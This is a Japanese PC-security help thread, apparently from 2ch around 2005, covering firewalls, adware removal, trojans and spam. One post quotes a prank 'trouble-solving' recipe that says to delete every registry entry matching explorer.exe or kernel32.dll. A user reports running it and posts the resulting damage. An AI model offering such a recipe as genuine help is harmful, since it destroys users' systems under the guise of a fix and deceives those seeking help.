ZAやkerioにもIDSがあったと思いますが、とりあえず今の状況で疑わしい通信はブロックしてるという事ですね。
マカでだけ検知するのはよく解りませんが、レス有難うございました。

どうしたら皆さんのようにパソに精通した人間になれますか？
お勧めの本などはあるんでしょうか？自分素人です。

>>444
本を金払って買うのもいいが、せっかくネット環境があるんだからそれを使うべき
パソコンやってて解らん事あったら、調べる。それを繰り返せば知識くらい身につく
ちなみに漏れはWin95時代にPCをオクで買って、破壊→修復を何度もやって学習した

どうしたら皆さんのようにNASAでパソの研究者になれるんですか？
僕もNASAで働いてみたい

(,,ﾟДﾟ)∩先生質問させて下さい。
>>5のFirewallの中で一番メモリを食わないものはどれですか？
軽くて丈夫な奴。
今はZoneAlarm入れてるんですが自分のしょぼいノートPCじゃ重いです。

>>447
kerioに身売りする前のやつ

>>448
レス有難う御座いまする。
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/kpf_home.html
↑ですか？取り敢えず導入してみます。

＞パソコンのトラブル解消法（ME/XPはシステムの復元をOFFに）
＞パソコンをセーフモードで起動する
＞↓
＞[スタート]をクリックして「ファイルを指名して実行」をクリックする
＞↓
＞「regedit」と入力してOKをクリックする
＞↓
＞レジストリエディタが開く
＞↓
＞編集→検索をクリックする
＞↓
＞「explorer.exe」ないし「kernel32.dll」を検索する
＞↓
＞検索して見つかった物を片っ端から削除
＞↓
＞検索が終わったらパソコンを再起動する
＞↓
＞問題解決
＞↓
＞（・∀・）ウマー！

これを実行した場合、どれくらいの被害が出ますか？

おまえこれか？
http://pc8.2ch.net/test/read.cgi/pcqa/1116565945/352

>>451
それです
本当なら実行して被害の程を見てみようとも思いましたが
専門的な知識が乏しいんで実行したら復旧できる自信が無いです

お気に入りに登録した２ｃｈのアイコンが、一日のうちにころころ変わるのですが、
オイラのＰＣが変なのでしょうか。WIN98se。
これってもしやウィルス？ノートンは無反応です・・・。

>>452
おれの生き様をみとけ‥　　　　おりゃぁぁぁぁ‥

- - - - - - しばしまて - - - - - -

>>454
無茶はいけませんぜぇぇ兄貴ぃぃ

>>449
TinyPeronalFirewallってやつで、Kerioに買収されてからのじゃないっす
今はどこかに残っているんだろうかね

>>454
ちょっと待てｗ本当に実行したのか？

>>454
のその後が気になる・・・・・・

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::。:::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::。::::::...... ...　　 --─-　　:::::::::::::::::::: ..::::: . ..::::::::
:::::::::::::::::...... ....:::::::゜::::::::::..　　 （___ ）（___ ）　::::。:::::::::::::::::　゜.::::::::::::
:. .:::::。:::........　.　.::::::::::::::::: _　i/ ＝　＝ヽi　:::::::::::::。::::::::::: . . . ..::::
:::: :::::::::.....:☆彡::::　　　／/[||　 　 」　　||]　>>454::゜:::::::::: ...:: :::::
　:::::::::::::::::: . . . ..: ::::　/　ﾍ　| |　 ____,ヽ | |　:::::::::::.... .... ..　.::::::::::::::
::::::...゜　.　.:::::::::　　／ヽ ﾉ　 　 ヽ＿＿/　　.......　.　.::::::::::::........ ..::::
:.... .... ..　.　　　　 く　 /　　　 　三三三∠⌒＞:.... .... ..　.:.... .... ..
:.... .... ..:.... .... ..... .... ..　.:.... .... ..　..... .... ..　..... ............. ..　.　........　......
:.... . ∧∧　 　∧∧　　∧∧　 　∧∧　.... .... ..　.:.... .... ..... .... ..　.
... ..:（　　 ）ゝ （　　 ）ゝ（　　 ）ゝ（　　 ）ゝ無茶しやがって… ..........
....　 i⌒　/ 　 i⌒　/ 　i⌒　/ 　 i⌒　/　..　..... ................... ..　.　...
.. 　 三　 | 　 三　 | 　 三　 | 　 三　|　　... ............. ...........　.　.....
...　 ∪ ∪ 　 ∪ ∪ 　 ∪ ∪ 　∪ ∪　............. ............. ..　........　...
　　三三　　三三　　三三　　　三三
　三三　　三三　　三三　　　三三

>>452
あ〜、ほいでな。　数十個のエントリ消しまくってから再起動かけた。
そのあとHijackThisにかけるとこんなの↓が出た。　シェルが設定されてないといってるらしい‥
F2 - REG:system.ini: Shell=
FWにOutpost入れてたけど起動しなかった↓
O23 - Service: Outpost Firewall Service (OutpostFirewall) - Unknown owner - C:\PROGRA~1\AGNITUM\OUTPOS~1.0\outpost.exe (file missing)
あとで巨乳でGoogleイメージ検索してみたが成功した。その程度のことは支障なくできるようだ。
まあ再起動できてしかも動くってのが分かっただけでいいや。　
おかしなとこがあるかもしれんが本来やらない操作なんで深く追求はせんよ。

みんな、なんか心配かけたみたいだけど生きて戻れたよ。
おれは除隊して妻子と牧場やります。ではさようなら。

>>460
すげぇ、あんたすげぇよ

トロイの木馬踏んでしまって
マカフィーが反応して感染ファイルを削除したんですけど
このあとどうすればいいんでしょうか

>>462
削除したんでしょ。
だったら無問題。
心配ならウイルススキャンすれ。

>>462
レジストリ弄られてなきゃいいけどな

ノートンを作動させたらCYDOORと言うものが見つかりました。
で、除去しようとしたのですが、ノートンを最新にアップデートした（つもり）のに
除去できません。
で、仕方なシマテックのところに書いてあるレジストリから削除の方法をとろうとしたのですが
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
c. 次のレジストリ・キーを選択して削除します。

HKEY_USERS\.DEFAUL\Software\Cydoor
HKEY_USERS\.DEFAULT\Software\Cydoor Services
HKEY_CURRENT_USERS\Software\Cydoor
HKEY_CURRENT_USERS\Software\Cydoor Services
HKEY_LOCAL_MACHINE\Software\Cydoor
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・

Software以下探してもCydoorは見つかりませんでした。
多分フリーソフトのフラッシュゲッツをＤＬした時紛れ込んでいたのだと
思いますが、上記ソフトは使わないので消しても全く構いません。

どうしたら、この気に食わないヤツ”CYDOOR”を消すことが出きるのでしょうか
教えてください。

>>463
>>464
ちなみにExploit-nocnocというやつです
今スキャンしています
レジストリいじられたらどうなるんですか？

>>465
Adwareなので、Ad-Aware使って駆除

>>466
http://www.nai.com/japan/security/virE2000.asp?v=Exploit-Nocnoc

動画ファイルの拡張子を極窓で判別すると、mpg→mpgでも、検出された拡張子の数が
2〜3だったりするんでが怪しいですか？
フォルダオプションの拡張子表示では、1つしか見当たらないんですが。
それとこれとは全く別の意味なんですかねぇ？
ちなみにバスターには引っかかりません。

>>465
フラッシュゲットについてくるやつですよね。オレも同じようにNortonで消そうとがんばった
んだけど消えなくて、Ad−Awareで消せました。SPY　BOTSでは検出だけして、消せな
かったような･･･。

以前、自分のメルアドでログインするタイプのサイトにあった
懸賞のバナーをクリックしたら応募するしないの意思確認もなく
「ご応募ありがとうございました。」と表示されました。
しまったと思ったのですが以来、スパムメールが頻繁に
来るようになりました。そのメールに書かれている配信停止の方法
も試したのですがいっこうに配信停止される気配もありません。
むしろ配信停止措置はアドレスが生きてる事を証明するだけですので
まずかったかとも思っています。今後の措置として
気長に配信停止措置を繰り返すのと無視するのと
どちらが有効だと思います？

>>470
メールソフトでフィルタルール作って自動的にごみ箱直行。
後は一切無視。

どうしてもというならここへ。
http://www.dekyo.or.jp/soudan/top.htm

トロイwin32/Agent AY
ウイルス駆除できないとでました。
駆除するには初期化するしかありませんか？

初期化する場合、ランボードはずしてからしたほうがいいですか？
それとも、そのまま初期化してしてもいいですか？

ウイルスしてるとき、このようなメッセージがでました。
「ファイルを開けません。他のアプリケーションによって
排他的に使用されてます」これってどう意味でしょうか？

質問です。Ｎｏｒｔｏｎ　Ｉｎｔｅｒnet Security 2004をアンインストールしてから、再インストールしたところ、ＮＩＳを起動しようとすると
Ｗindowsインストーラが立ち上がり、「選択した機能は現在使用できないネットワークリソースにあります」と表示されます。
そのままＯＫをクリックするとパスが見つかりませんとでてきて、ＷＭＩ　Ｕpdateをインストールしてくださいとことです。
インストールはしてあると思うんですが・・・　　どなたか対処法教えてください。ＯＳはＸＰです。

>>472
とりあえずこの位の情報は開示してから質問汁
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

>>473
うまくいくかしらんがここみてきっちりアンインスコしてみ
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨVer.65【自己陶酔Ver2005】
http://pc8.2ch.net/test/read.cgi/sec/1116594982/12

【使用OS】Windows98(NT)
【WindowsUpdateしてるか】してます。
【AntiVirusは何を使っているか】キャノン、ＮＯＤ３２
【ちゃんとUpdateしてるか】しています。
【スキャンした結果（ウイルス名・発見場所）】Win32/Agent AY　Ｄから出ました。
【別のオンラインスキャンしたならその結果は】シマンテックでしました。
７ハードディスク上のファイルが感染しています。（adware.Gator)あとwin32/Agent AYに感染してます。
【症状を具体的に、分かる限りすべて書く】わかりません。
【これまでにとった措置】ウイルススキャンのみ。ただ、adware.gatorとwin32/agent AYは駆除できないとでました。
【その他の質問】もしも、初期化して再インストールする場合、ランカードは外してたほうが
よいですか？それとも着けたままでいいですか？再インストール以外の方法はありますか？

すいません、ランボードの間違えです。お願いします。

>>476
セーフモードでも出来ないの？っていうか価格.comのアレ？
Antidoteとかでも試してみれば？

>>476
キヤノン　NOD32 のウイルス情報って使えね〜。だめだなありゃ。
Win32/Agent AYがシマンテックでいうところのAdware.Gatorならここ見れ。
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gator.html
トレンドのも参考に汁
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=SPYW_GATOR.B

再インストールする場合NICははずさなくてもいい。
セットアップ後ドライバーをインストール汁

>478
セイフモードは文字バケのときしか使ったことないです。
セイフモードでウイルススキャンするんですか？
（初心者ですいません。）
カカクで気づきました。Antidoteやってみます。ありがとう。
>479
参考にさせていただきます。ありがとう。

【使用OS】WindowsXP sp1
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】Norton Internet Security2005
【ちゃんとUpdateしてるか】はい
W32.Sober.O@mmに感染したようなので、削除したあとにセーフモードで
アンチウィルスと駆除ツールを使っても検出されなくなりました。
しかし、アウトブレーク警告では、いまだにW32.Sober.O@mmが表示されます。
一体どうなってるのかご教授ください。お願いします。

>>481
同じ症状の人がいるねぇ。解決には至ってないようだが・・・
ご参考までに

質問：アウトブレイク警告の緊急の注意表示が消えません
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1379083

>>482
同じW32.Sober.O@mmですし、ノートン側に何らかの問題があるんですかねぇ。
駆除ツールが対応するようになってから、２０日近くたってるのになんとも・・・

上の方でCYDOORを質問したものです。
お応えありがとうございました。
で、Ad-Aware使って駆除してみようとググってＤＬしたのですが
これの日本語パッチはもう終了してしまっているのでしょうか。（以下）

http://bdc.s15.xrea.com/index.php?option=com_content&task=view&id=261&Itemid=1

>>484
もうないよ。

>>485
そんな、つれない｡･ﾟ･(ﾉД`)･ﾟ･｡

別に日本語化しなくても使い方自体は簡単でしょ？

>>487
何とかNEXTを辿っていき、REMOVEしました。
何年か前、これを使っていたのですが、アップデートするソフトが別にあったような気がします。
今も存在しますか？

インターネットオプションから詳細設定にクリックしたら
チェック入れるボックスがなにか変な絵に変化してます。
どうしちゃったんでしょうか？

>>488
意味がよくわからんが、ここ参考にする（´・ω・）ｽ

アダルトサイト被害対策の部屋
Ad-Aware SEによるスパイウェアの除去方法
ttp://www.higaitaisaku.com/adaware.html

>>460
＞数十個のエントリ消しまくってから
全部じゃないと、ちゃんと起動できます。し、レジストリが読み取り専用になっていると復活するよ。

>>490
ありがと！
アダルトサイトは見ませんが、一生懸命勉強してみます。

たとえばの話し
ルーターのＦＷ
セキュリティソフトのＦＷ
ＷｉｎＸＰのＦＷ
3枚がけなんてことは可能ですか

>>493
可能

ネットを見ていると、至る所で

ランタイム エラーが発生しました。
デバックしますか？

行:
エラー:


というのが出てくるようになりました。
行とエラーはいろいろな種類があります。
ネットで調べる限り相手側の問題だとあるのですが、最近になって気になるくらいに出てくるようになったので、もしかしたらこちら側の何かが改ざんされてしまったのだろうかと思い、質問させていただきました。

NOD32、NAVにて確認しましたが、ウイルスは未検出でした。
OSはWinXPsp2、ブラウザはsleipnirです

たとえば、ヤフーオークションのトップページに行くと　行:409　　エラー:実装されていません
というのが出てきます